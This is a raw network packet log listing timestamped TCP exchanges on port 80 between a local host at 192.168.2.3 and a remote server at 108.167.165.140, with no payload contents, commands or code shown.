Jan 14, 2022 13:49:22.655647039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655663967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655680895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655680895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655699968 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655711889 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655719042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655736923 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655740976 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655759096 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655776978 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655777931 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655797005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655812979 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655822039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655829906 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655838966 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655858994 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655859947 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655877113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655894995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655895948 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655910969 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655929089 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655930996 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655946016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655951977 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655962944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655981064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655981064 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655997038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656013966 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656019926 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656030893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656048059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656054974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656064987 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656081915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656083107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656099081 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656116009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656117916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656136036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656150103 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656153917 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656171083 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656181097 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656188011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656205893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656205893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656222105 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656234980 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656239986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656256914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656274080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656291962 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656291962 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656308889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656326056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656337976 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656342983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656359911 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656371117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656378031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656394958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656410933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656418085 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656428099 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656444073 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656460047 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656467915 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656477928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656493902 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656510115 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656511068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656527996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656544924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656562090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656563997 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656578064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656590939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656594992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656611919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656622887 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656629086 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656645060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656651974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656662941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656677961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656682014 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656694889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656703949 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656711102 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656728029 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656743050 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656744957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656761885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656779051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656786919 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656796932 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656812906 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656822920 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656830072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656847954 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656863928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656881094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656883955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656897068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656913996 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656914949 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656930923 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656944990 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656946898 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656970024 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656970024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.656986952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.656994104 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657002926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657020092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657032013 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657037020 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657054901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657068014 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657073021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657088995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657094955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657107115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657119036 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657124996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657141924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657156944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657159090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657176018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657192945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657202005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657211065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657227039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657232046 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657246113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657264948 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657265902 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657284975 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657284975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657303095 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657320976 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657325029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657337904 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657356977 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657365084 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657372952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657387972 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657390118 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657406092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657413960 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657423019 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657439947 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657449007 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657454967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.657484055 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.657510996 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.240382910 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.400569916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400631905 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400671005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400710106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400748014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400779963 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.400789022 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400815964 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.400830030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400830030 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.400868893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400908947 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400917053 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.400948048 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400985003 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.400995016 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401026011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401063919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401077986 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401103973 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401143074 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401180983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401221037 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401241064 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401251078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401259899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401297092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401336908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401379108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401380062 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401392937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401420116 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401460886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401464939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401499033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401539087 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401577950 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401602983 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401628971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401647091 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401670933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401710033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401729107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401750088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401789904 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401794910 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401825905 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401899099 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401917934 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.401940107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.401979923 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402018070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402034044 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402045012 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402059078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402097940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402102947 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402112961 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402137995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402159929 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402178049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402215958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402219057 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402229071 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402256012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402295113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402312040 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402333021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402354002 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402376890 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402376890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402416945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402431011 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402456999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402463913 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402498960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402508020 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402535915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402544975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402575970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402584076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402615070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402621031 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402652979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402667046 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402693033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402703047 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402733088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402746916 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402772903 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402789116 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402813911 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402842999 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402851105 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402874947 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402892113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402892113 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.402930975 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402968884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.402987957 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403007984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403023958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403045893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403062105 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403086901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403104067 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403127909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403156996 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403166056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403207064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403212070 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403220892 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403245926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403266907 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403284073 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403304100 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403323889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403347969 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403363943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403378963 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403404951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403422117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403445959 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403456926 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403485060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403498888 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403526068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403532982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403565884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403582096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403603077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403620958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403642893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403662920 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403681993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403703928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403723001 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403723955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403764963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403779030 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403803110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403820038 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403841972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403862953 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403882027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403901100 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403919935 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403939009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.403959990 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.403974056 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404000998 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404015064 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404041052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404052019 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404083014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404098034 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404120922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404134989 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404161930 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404196024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404200077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404210091 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404237986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404247999 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404278994 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404293060 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404318094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404351950 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404371023 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404397011 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404412985 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404453039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404468060 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404479027 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404491901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404495955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404532909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:23.404541016 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:23.404571056 CET	80	49743	108.167.165.140	192.168.2.3
